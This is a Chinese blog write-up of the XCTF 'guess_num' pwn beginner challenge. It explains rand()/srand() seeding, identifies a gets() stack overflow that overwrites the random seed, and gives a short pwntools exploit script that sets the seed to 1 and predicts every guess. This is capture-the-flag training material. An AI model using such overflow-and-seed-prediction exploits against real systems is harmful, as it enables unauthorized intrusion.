攻防世界pwn新手区guess_num

最新推荐文章于 2022-06-01 08:00:08 发布
最新推荐文章于 2022-06-01 08:00:08 发布
阅读量580 收藏 3
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46711318/article/details/107890250
版权

最近重新回去看新手区的题目时发现一个挺有趣的东西,就是猜随机数,这里涉及到libc库中的rand()和srand()函数的应用,所以在讲题目之前我想先讲一下rand()和srand()函数的概念。
rand()函数会生成随机数,但这个随机数并不是真的随机数,由于周期比较长,他们只是在一定范围内随机,因此在调用rand()函数之前,可以使用srand()函数设置随机数种子,如果没有设置随机数种子,rand()函数在调用时,自动设计随机数种子为1。而srand()中的种子seed通常会用time(0)或geypid(0)的返回值作为seed。有了这个概念对我们接下来做guess_num有很大帮助
checksec
在这里插入图片描述
打开了Canary和NX保护,我们接着往下看。
ida
在这里插入图片描述

在这里插入图片描述
可以看出,在v8处有一个栈溢出,我们可以通过栈溢出到sub_C3E()拿到flag。
在这里插入图片描述
发现var_30到seed偏移0x20,因为看到有Canary保护我一开始会觉得是否需要绕过,但发现seed的在cookie前面,因此不需要绕过。
如果使输入的guessnumber,即v4等于随机数v6,即可cat flag。
代码
因为题目没有提供libc库,因此需要使用ldd查找
在这里插入图片描述
代码如下:


from pwn import*
from ctypes import*
r=remote('220.249.52.133',33383)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
payload='a'*0x20+p64(1)
r.sendlineafter('name:',payload)
libc.srand(1)
for i in range(10):
	num=str(libc.rand()%6+1)
	r.sendlineafter('number:',num)
r.interactive()
weixin_46711318
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界pwn-guess_num
a_silly_coder的博客
01-15 1582
下载文件后,首先检查保护 开启了金丝雀,不能溢出到返回地址 将文件拖入ida阅读 代码逻辑是:首先输入name(赋值给v7),接着使用seed[0]作为种子生成10个随机数,每一轮都要猜对,10轮后进入sub_C3E()函数,我们进入这个函数后,发现是直接执行cat flag。 回头看main函数,发现v7和seed[0]都在栈上,且给v7赋值时使用的gets()方法 所以确定攻击思路:在输入name时,输入足够长的数据,覆盖seed[0],然后自己模拟C语言的rand()方法生...
攻防世界PWN-guess_num
Deeeelete的博客
11-16 674
题目:guess_num checksec查看详情 64位以及各种防护全开 运行一下逻辑,的确是一个猜数游戏 进64位IDA 反编译main函数 出源码 摘代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { FILE *v3; // rdi@1 __int64 v4; // rax@1 const char *v5; // rdi@1 __int64 result; // rax@7 __in
[攻防世界 pwn]——guess_num
Y_peak的博客
02-19 1128
[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙 在IDA中发现 我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;
攻防世界 - pwn - guess_num
qq726232111的博客
03-16 1079
A、程序分析 1、 分析程序发现连续输入密码正确10次即可获取flag 2、 gets(0,rbp-30h) srand(rbp-10h) 通过输入用户名可以覆盖srand的种子,srand rand为伪随机,种子一样时随机数相同 3、 ...
(wp)攻防世界PWN——guess_num
0pt1mus
04-02 1136
转载自个人博客0pt1mus 好久没有做PWN题了,今天开始做一下,把之前的东西捡起来,同时对之前有些知识点也有了新的认识,新的理解。 分析 首先将附件下载下来,同时通过nc连接一下,了解一下大致的流程。 可以看到,先让我们输入用户名,然后输入猜的的数字。 然后常规操作,通过file和checksec工具判断文件类型和开启了那些防护措施。 可以知道这是一个64位的linux程序,并且开启了部分...
【广东大学生网络攻防大赛】Pwn | jmp_rsp 题目附件
05-24
5. **解题策略**:在广东大学生网络攻防大赛的"Pwn"类题目中,参赛者需要理解漏洞的原理,分析程序的内存布局,找到可利用的gadgets,构造溢出payload,并利用"jmp_rsp"或其他方法控制程序执行流程。这需要扎实的...
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
攻防世界 guess_num
09-27 1048
1.题目 2.Ida反汇编 3.根据上图代码,分析基本流程。 流程:随机种子生成随机数,对比随机数和输入的数字,连续正确10次就成功。 初看好像不可能成功,怎么可能猜对随机数十次?其实srand生成的随机数是伪随机数。其实就是一个很长的数字字符串,然后根据种子定位到这个字符串某个点,然后每次生成随机数就读一个数字字符。也就是说,如果我们的种子是一样的,相同的随机次序我们得到的随机数是一样的。 于是,现在的问题变成了我们怎么得到程序的种子?或者我们是否可以修改程序的种子? 查看c源码.
[攻防世界]guess_num
逆向萌新的博客
06-01 692
目录步骤:查保护:NX保护:PIE保护:Stack保护:RELRO保护:寻找逻辑:脚本:checksec 文件名NX即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,此时CPU就会抛出异常,而不是去执行恶意指令。PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局
攻防世界 pwn 练习 guess_num
ChaoYue_miku的博客
07-12 637
题目描述:菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 ** 0、下载附件,使用checksec查看保护情况和文件位数,尝试打开文件 ** 64位可执行文件,开启了canary,NX,PIE和部分RELRO保护 ** 1、使用IDA64 Pro打开文件 ** 查看main函数,是一个猜数游戏,通过srand()函数初始化rand()函数的初始值,seed[0]作为种子,然后进行10轮猜数,全部正确之后,执行sub_C3E()函数。 查看sub_C3E()函数: 执行后直接得到flag
初学pwn-攻防世界(guess_num)
天柱的博客
08-28 1119
初学pwn-writeUp 攻防世界的第六题,guess_num。 从这个题目可以猜出来,是跟猜数字有关的题目。启动靶机。 使用nc链接远端,查看一下。 发现链接之后,首先是输出了欢迎界面,之后需要输入一个名字。输入完成之后就要求开始猜数字。但是要命的是,只能猜一次,猜错了就GG。没有办法,这条路行不通。 下载文件,cat一下,很明显,是一个ELF文件。放进ida里查看一下。 发现这里的逻辑,就是生成一个伪随机数,然后进行猜数字。可以看到在23行这里,给srand函数设置了一个种子,然后进入循环,生成随
攻防世界逆向 Guess-the-Number分析
yoyo_573的博客
09-26 539
使用java反编译软件查看源码 jd-gui 链接:https://pan.baidu.com/s/1oP-oHKwRS5WUNuOPTYmGzA 提取码:ddzg 看源码 定义了一个XRO函数,对str_one和str_two进行异或操作返回16进制字符串,得到的就是flag 转成python代码如下 str_one ='4b64ca12ace755516c178f72d05d7061' str_two ="ecd44646cfe5994ebeb35bf922e25dba" """ 1、int(x,ba
攻防世界-pwn新手-guess_num
CHAWUCIREN1的博客
08-09 190
发现get()危险函数,该函数可以进行任意长度的输入 下面有seed函数,该函数为C语言中产生随机数的种子。 查看一下其栈空间 我们可以去覆盖一下这个seed地址 看了一下其他大佬的博客,知道可以用python的内置函数ctypes,进行C语言代码的调试 只需要将种子覆盖为1,然后调用C语言的libc共享库,得到这个种子产生的随机值,就能够保证每次猜对了。 from pwn import * from ctypes import * context(os='linux',arch='amd64',lo.
攻防世界guess_num
zyh18851473527的博客
08-05 3038
首先下载附件 checksec一下再放入IDA中 点击进入sub_C3E函数,发现条件成立即可找到flag 接着进入v7 发现var_30在栈中占0x20,可以覆盖到seed 即利用v7覆盖seed[0],使seed[0]已知,然后循环,然后直接拿flag就好了 ...
攻防世界-guess_num
qq_45771413的博客
04-23 477
查看保护 好家伙,不留活口(;´д`)ゞ IDA 逻辑很简单,输入名字后,程序会生成一个随机数种子,然后循环10次以下操作: 输入一个数,这个数和本次随机循环数值除以6的余数+1是否相等,相等则跳转到函数 sub_C3E() ,这里面直接有 system(“cat flag”); 分析 10次随机数必不能每次都对,所以得想办法绕过随机数或者修改随机数种子,让其种子固定则其生成的随机数也固定。 本体最有可能栈溢出的地方就是gets,gets获取输入存到v7,进入v7看看有没有漏洞: 可以看到v7下面就是s
攻防世界pwn新手题答案
最新发布
08-10
回答: 对于攻防世界pwn新手题,其中一个关键是要修改全局变量pwnme的内容。通过格式化字符串的方法,可以实现这个目标。格式化字符串的原理是利用输入的格式化字符串,修改内存中的指定位置的值。具体的方法可以参考...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值